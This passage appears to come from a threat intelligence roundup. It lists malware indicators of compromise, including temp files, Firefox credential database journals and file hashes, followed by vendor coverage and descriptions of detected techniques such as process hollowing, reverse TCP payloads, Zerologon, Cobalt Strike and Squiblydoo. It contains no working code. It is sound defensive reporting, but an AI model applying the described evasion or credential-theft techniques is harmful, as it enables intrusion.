%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cert9.db-journal 17
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\key4.db-journal 17
%ProgramFiles(x86)%\Vhxwcgzi.tmp 17
%TEMP%\3785372676.tmp 1
%TEMP%\3785400788.tmp 1
%TEMP%\tmp722E.tmp.ps1 1
%TEMP%\tmp8687.tmp.ps1 1
%TEMP%\3785369587.tmp 1
%TEMP%\tmpDE57.tmp.ps1 1
%TEMP%\tmp92F5.tmp.ps1 1
%TEMP%\tmp1253.tmp.ps1 1
%TEMP%\tmp7EDB.tmp.ps1 1
%TEMP%\tmp9823.tmp.ps1 1
%TEMP%\tmpE9C.tmp.ps1 1
%TEMP%\tmpFCEE.tmp.ps1 1

*See JSON for more IOCs

File Hashes

04552b5e285a9fcfb2f52f20675e001fd8ce1a8047dcccb5d0a76e210454c681
0bf03550395ad5269605464613abdcee1e9cc7d8ad0c5a33f6112be835de910e
0d7154ad1b934c1042b1c55a39e3914c33cf607c563450207608674e9fc23955
0d9e6b1acf20992caa69b3419391d0b42b182a40332529db44c1a37b8ce80abe
10df1e1e3754d9578d96191fc4e9fda06215447e095c8f036c0953791efcdfa5
14ceac287c2a1833dcf348b627f06b3c974c725a22f28442fe852c9e188bd545
1b9e977a53e7219994fbb11b9f8f2c8632d9f900ea49ee0debef245fb3cd056b
1d7f86ec4a2a6ea4ff6524bc88a7a1de8b52b09556ad53ac70bf7adf01fba0ec
2113cc1b08d8d66a1f6af87df75713325a2a4af4365cb4a2d81ff65acefb3e1a
21ebf0a15597cf2025989348561e174ea5ec1bddf7bacfebb1eb0c77ac8ee35c
2230e8a3f5ee7812d08d3d519a1bce53a095f51e061ddac3c3a7d23c1b09518f
2351c47ba13aa93905f377c2648ed57a1d36dc694f1b19bfd82982857b4e8b75
27a49c51e73dc26ca9b12da576d6612561a9ff8bce22180f0f9d1df1afb56a35
280468dad8b329f550e4b9ae72565d821667654b66d279162af0ab90e0998f07
29c45f2439835eadff94b3e61fa8dd9197408d8b80c63cc09a2d0cce69022871
2b84ce28a36b679502ef3ecdf8d04f8a72cfd6d5fc8abe4cc9f217636b6524c9
31ef4ba41acf7b39459b0878f9c1af1b2967acab46883c8d454e6ef621cb3917
3275263afd153fea6ac7eb9782eaf15655dfb364ef3769e57c740fef5ee10914
38db7a323f7dc3350973e9b18d9e730318cc2a7dab5154b40a4a17ed8c21319a
3cb7befe1d5e97125c29c283641eac5defdb091a25065fdf3ea1ac22f1268f38
4385ef749b3490998e7243158edb6de44510d4b5669a71f347e9de2c2bed7d8c
46b1ccddd1cbbd063d3f2971c7d49f6a05cae925797b8ef0473282bc7d66756e
46cfe911e21a2e419a5d2928d0c8981772bdb6611e3fe407897462720c5c4226
48d89a8ffac52d95d703f191d185c9f9d9ff4bfd4f3b00218cb309eef4a821cd
4bdeb3338b3de1b5cc76337f58008348590032f99f5f046041f61bf0779fdfb0

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (13807)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
A Microsoft Office process has started a windows utility. - (11065)
A process associated with Microsoft Office, such as EXCEL.exe, OUTLOOK.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Excessively long PowerShell command detected - (3208)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Reverse tcp payload detected - (3033)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
CVE-2020-1472 exploit detected - (1991)
An attempt to exploit CVE-2020-1472 has been detected. Also known as "Zerologon". This is a privelege escalation vulnerability in Netlogon.
Cobalt Strike activity detected - (1437)
Cobalt Strike is a tool used by both penetration testers and malicious actors. It has been observed being used to deliver Ryuk ransomware and other payloads.
Crystalbit-Apple DLL double hijack detected - (1328)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Dealply adware detected - (1201)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Maze ransomware detected - (691)
Maze ransomware has been detected injecting into rundll32.exe or regsvr32.exe. Maze can encrypt files on the victim and demand a ransom. It can also exfiltrate data back to the attacker prior to encryption.
Squiblydoo application control bypass attempt detected. - (668)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.